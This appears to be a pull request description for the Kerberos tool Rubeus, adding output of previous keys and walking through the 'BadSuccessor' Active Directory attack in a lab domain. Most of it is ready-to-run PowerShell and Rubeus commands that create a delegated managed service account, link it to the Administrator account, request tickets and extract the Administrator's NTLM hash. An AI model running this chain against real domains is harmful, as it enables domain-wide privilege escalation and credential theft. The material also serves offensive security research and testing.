add capability to print previous keys

[LazyTitan33]

Added print option for previous keys found in TGS, including keys of preceding managed accounts. The full attack chain for BadSuccessor now prints the NTLM hash of the Preceding Managed Account as well.

First create the dMSA account

New-AdServiceAccount -Name "attacker_dmsa" -DNSHostName "lab.lazy" -Path "OU=Staff,DC=lab,DC=lazy" -CreateDelegatedServiceAccount -PrincipalsAllowedToRetrieveManagedPassword  "lazytitan"

$sid = (Get-ADUser -Identity "lazytitan").SID
$acl = Get-Acl "AD:\CN=attacker_dmsa,OU=Staff,DC=lab,DC=lazy"
$rule = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $sid, "GenericAll", "Allow"
$acl.AddAccessRule($rule)
Set-Acl -Path "AD:\CN=attacker_dmsa,OU=Staff,DC=lab,DC=lazy" -AclObject $acl


Set-ADServiceAccount -Identity attacker_dmsa -Replace @{
    'msDS-ManagedAccountPrecededByLink' = 'CN=ADMINISTRATOR,CN=USERS,DC=LAB,DC=LAZY'
    'msDS-DelegatedMSAState' = 2
}

Get-ADServiceAccount -Identity attacker_dmsa -Properties msDS-ManagedAccountPrecededByLink, msDS-DelegatedMSAState | Select-Object Name, msDS-ManagedAccountPrecededByLink, msDS-DelegatedMSAState

Get a TGT ticket for the account that created the dMSA account.

.\Rubeus.exe asktgt /user:lazytitan /aes256:02F93F7E9E128C32449E2F20475AFCDFB6CC2B4444AC8FD0B02406AF018F75E5 /domain:lab.lazy /nowrap /ptt

Request a TGS

When requesting the TGS it will now print the previous NTLM hash for managed account as well. In this example, the hash of the Administrator.

.\Rubeus.exe asktgs /targetuser:attacker_dmsa$ /service:krbtgt/lab.lazy /dmsa /opsec /ptt /nowrap  /ticket:<base64 ticket from previous>

[LazyTitan33]

better PR #204 already exists for this